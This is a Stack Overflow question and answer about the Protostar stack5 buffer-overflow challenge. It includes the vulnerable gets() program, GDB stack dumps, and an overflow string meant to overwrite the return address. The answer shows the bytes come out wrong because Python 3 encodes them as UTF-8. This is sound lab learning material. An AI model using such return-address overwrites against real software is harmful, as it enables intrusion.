Overflowed bytes different than those I see on GDB?

Question

I am trying to do the ProtoStar stack5 challenge. I know the solution (following a write up), but I am trying to come up with a different approach.

Here is the source code for the program we are trying to execute shellcode on:

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
  char buffer[64];

  gets(buffer);
}

So just to see what is going on in the registers, I do the following:

(gdb) n
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
11      in stack5/stack5.c
(gdb) x/30x $esp
0xbffff750:     0xbffff760      0xb7ec6165      0xbffff768      0xb7eada75
0xbffff760:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff770:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff780:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff790:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff7a0:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff7b0:     0x41414141      0xbffff800      0xbffff85c      0xb7fe1848
0xbffff7c0:     0xbffff810      0xffffffff
(gdb) p $ebp
$1 = (void *) 0xbffff7a8
(gdb)

Good, I am overflowing the return address with 41414141. As expected. Now, what I want to do is change the return address to the next 4 bytes such that

00xbffff7a8: |saved frame pointer| - | return address| - |shellcode part 1| - |...| - |shellcode part n|

However, when I try to write 76 "41"s, and then the address 0xbffff7a8 + 4 (which is 0xbffff7b0), it keeps writing the wrong thing. Here is what I input:

41414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141b0f7ffbf

Note that we are in a little endian system.

When I input this however (as ASCII), this is what I see on $esp and $ebp:

(gdb) n
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA°÷ÿ¿
11      in stack5/stack5.c
(gdb) x/30x $esp
0xbffff760:     0xbffff770      0xb7ec6165      0xbffff778      0xb7eada75
0xbffff770:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff780:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff790:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff7a0:     0x41414141      0x41414141      0x41414141      0xb7c3b0c2
0xbffff7b0:     0xbfc2bfc3      0xbffff800      0xbffff86c      0xb7fe1848
0xbffff7c0:     0xbffff820      0xffffffff ...
(gdb) p $ebp
$1 = (void *) 0xbffff7a8

As you can see, 0xb7c3b0c2 is written instead of the expected 0xbffff7b0

Anyone know why this is?

NOTE: I realize that the address I actually wanted was 0xbffff7ac, not 0xbffff7b0. I will fix this, but it does not change the problem I am encountering.

@ChristianGibbons the point of using `gets()` is to cause the overflow. It's common example code to expose the flaw in accepting input without bounds checking (and all of the other things mentioned in that SO post). The "bad" usage of `gets()` is intentional. — Veridian Dynamics, Mar 12 '20 at 19:25
@VeridianDynamics I am aware of this. I am trying to use the overflow, but the bytes I find on the stack are different than the ones I inputted (see last part of question). — Gabe, Mar 12 '20 at 19:29
Ugh lol I responded to someone else who recommended you don't use `gets()`. They apparently deleted their comment. Can you show me how you're inputting your bytes? — Veridian Dynamics, Mar 12 '20 at 19:29
@VeridianDynamics No problem :) To get to the $ebp + 0x4, I ned 76 chars. So I input 'A' 76 times, and then I enter the asccii equivalent of b0 f7 ff bf. Everything is the value I expect when I look at the stack on GDB, **except** the b0 f7 ff bf section. As you can see, 0xb7c3b0c2 is written instead. It is more clear at the end of the question if you need more info. Thanks for your reply! — Gabe, Mar 12 '20 at 19:35
@jwdonahue ```AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA°÷ÿ¿``` — Gabe, Mar 12 '20 at 19:58
Typed them from the command line or piped a file into it? I haven't done the math to check your bite alignments and my GDB foo was never strong, but I am wondering if this is an encoding issue? — jwdonahue, Mar 12 '20 at 20:11
@jwdonahue Sorry for the delay, this happens both when I pipe it using a python script, pipped manually, and inputted by simply running the program and pasting it. — Gabe, Mar 13 '20 at 05:03

score 0 · Accepted Answer · answered Mar 30 '20 at 00:13

So I ended up posting this issue on LiveOverflow's subreddit and I was pointed towards the direction of this video by LiveOverflow.

The video will explain it much better than me, but essentially, python2 and python3 do not print hex into ascii the same. Python3 inserts extra characters, while python2 prints the raw hex string.

I strongly encourage you to watch the video as it explains it indepth.

This answer from another question here on SO answered by @dsh also explains it:

The byte-sequence C3 BE is the UTF-8 encoded representation of the character U+00FE.

Python 2 handles strings as a sequence of bytes rather than characters. So '\xfe' is a str object containing one byte.

In Python 3, strings are sequences of (Unicode) characters. So the code '\xfe' is a string containing one character. When you print the string, it must be encoded to bytes. Since your environment chose a default encoding of UTF-8, it was encoded accordingly.

How to solve this depends on your data. Is it bytes or characters? If bytes, then change the code to tell the interpreter: print(b'\xfe'). If it is characters, but you wanted a different encoding then encode the string accordingly: print( '\xfe'.encode('latin1') ).

Overflowed bytes different than those I see on GDB?

1 Answers1